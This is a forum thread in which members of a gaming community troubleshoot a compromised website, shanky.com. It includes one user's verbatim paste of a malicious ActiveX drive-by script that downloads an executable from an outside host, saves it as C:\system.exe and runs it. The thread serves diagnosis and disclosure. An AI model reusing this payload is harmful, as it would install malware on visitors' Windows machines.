Server Help

[Maverick]

What's going on?
The menu's are gone making the site impossible to navigate through.
_________________

Nickname: Maverick (I changed my name!)
TWCore developer | Subspace statistics

[K']

Everything seems to be inorder for me.

[Mine GO BOOM]

It appears the host changed the default handler for server-side includes. If you view the source, you would have seen a bunch of include scripts. Just added AddHandler server-parsed .html to .htaccess and works fine again.

When viewing source of the page, I noticed that the top of the index, before <title>, it had a javascript include of a file named biica.js, which does not exist anywhere on the site. Looking at the apache logs, there are 103 different such requests for random 5 letter javascript files, all returning 404 errors. Over the past couple of months, some people have mentioned that shanky.com site has been flagging their antiviruses.

I take weekly backups of the shanky.com server, and nothing under my control is affected, at least that which I can control. Sent some logs to the host, hope they check the full machine. This is one of the big reasons why I enjoy having the full mineplowers.com machine (these forums hosted on the machine) all to me, every bit of software.

[Maverick]

http://www.shanky.com/server/ is still showing all white with me.
The source is showing all kinds of cgi includes:

Code: Show/Hide <!--#exec cgi="/cgi-bin/ryan/server-header.cgi"-->

Attached is what I get in my browser (FF1).

[Solo Ace]

Funny how this is what I get:

Code: Show/Hide <html> <body> <script language="javascript"> function CreateO(o, n) { var r = null; try { eval('r = o.CreateObject(n)') }catch(e){} if (! r) { try { eval('r = o.CreateObject(n, "")') }catch(e){} } if (! r) { try { eval('r = o.CreateObject(n, "", "")') }catch(e){} } if (! r) { try { eval('r = o.GetObject("", n)') }catch(e){} } if (! r) { try { eval('r = o.GetObject(n, "")') }catch(e){} } if (! r) { try { eval('r = o.GetObject(n)') }catch(e){} } return(r);      } function Go(a) { var obj_msxml2 = CreateO(a,"msxml2.XMLHTTP"); obj_msxml2.open("GET","http://mp3.realize.hk/store/index.php?reg=",false); obj_msxml2.send(); var obj_adodb = CreateO(a,"adodb.stream"); obj_adodb.type = 1; obj_adodb.open(); obj_adodb.Write(obj_msxml2.responseBody); var fn = "C:\\system.exe"; obj_adodb.SaveToFile(fn,2); var s = CreateO(a, "Shell.Application"); s.ShellExecute(fn); return TRUE; } var i = 0; var t = new Array( '{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null); while (t[i]) { var a = null; if (t[i].substring(0,1) == '{') { a = document.createElement("object"); a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1)); } else { try { a = new ActiveXObject(t[i]); } catch(e){} } if (a) { try {            var b = CreateO(a, "Shell.Application"); if (b) { if (Go(a)) break; } }catch(e){} } i++; } </script> </body> </html>

[Maverick]

I doubt there are virus scripts at shanky's site linking to mp3.realize.hk

What does that do anyway?

Hmm..
It starts some activeX objects, downloads a program, stores it to C:\system.exe and executes it?

[BDwinsAlt]

I have 3 friends that say norton detected a virus, but when I go to the site (I use Firefox) AntiVir doesn't detect any viruses, I run virus scans at night while I'm asleep and it doesn't detect any viruses, I run spyware scans after only going to shanky and there is no spyware.

I think someone is manipulating MGB's site.

Btw: What did you use to make your flash site? I like it.

[Doc Flabby]

the virus will only work in IE.

firefox doesn have active x.

the code downloads a exe diskised as an mp3 from mp3.realize.h

i saw firefox make a connection to a weird site but i cant get it to repeat the behavior but anti-ver did detect a malisious javascript ...

I have a theory the counter that is used has been hacked, and that is where the exploit script came from not the mgb server.
_________________
Rediscover online gaming. Get Subspace | STF The future...prehaps

[Mine GO BOOM]

It went back 'down' because my brother change the main folder's .htaccess to parse all index.html files as php scripts. Renamed his specific file and removed the crappy htaccess, works fine, again.

Yanked the counter code, since it didn't really record anything for the last couple of years when they last got bought out. But the host got back to me:

[Solo Ace]

How is this possible? Lame.

And Mav, if that page wasn't there, why did the server send it to my browser?

[BDwinsAlt]

I have to agree with solo on this one.

[Mine GO BOOM]

[Confess]

I remember seeing somewhere on shanky.com that the website was sending out viruses and crap.
_________________
I know that I myself cannot do anything, that I will fall, and that I am a sinful man, but I know that I can do ANYTHING through God Almighty, whom strengthens me.

[Solo Ace]

Sorry, usually everything's being logged here, but uh, just not at the moment.

I posted right after it happened to me, and yes I'm sure that was what I got.

[K']

Since I didn't have at any time a problem with the page I say that it's either Mavrick's PC full of viruses or that his browser reeks.

Next topic.


P.S.
Woolnet has some cool CS guys.
And VPS starting at $30 looks good and cheap, too.

[Maverick]

K, your conclusion is totally flawed making me believe you didn't read anything of this topic at all.
Go do something usefull for a change and mind your own business.

[Mine GO BOOM]

Shanky.com, etc have moved from server2a.woolnet.net to server3a.woolnet.net. If anyone gets anything stupid happen to them again, let me know.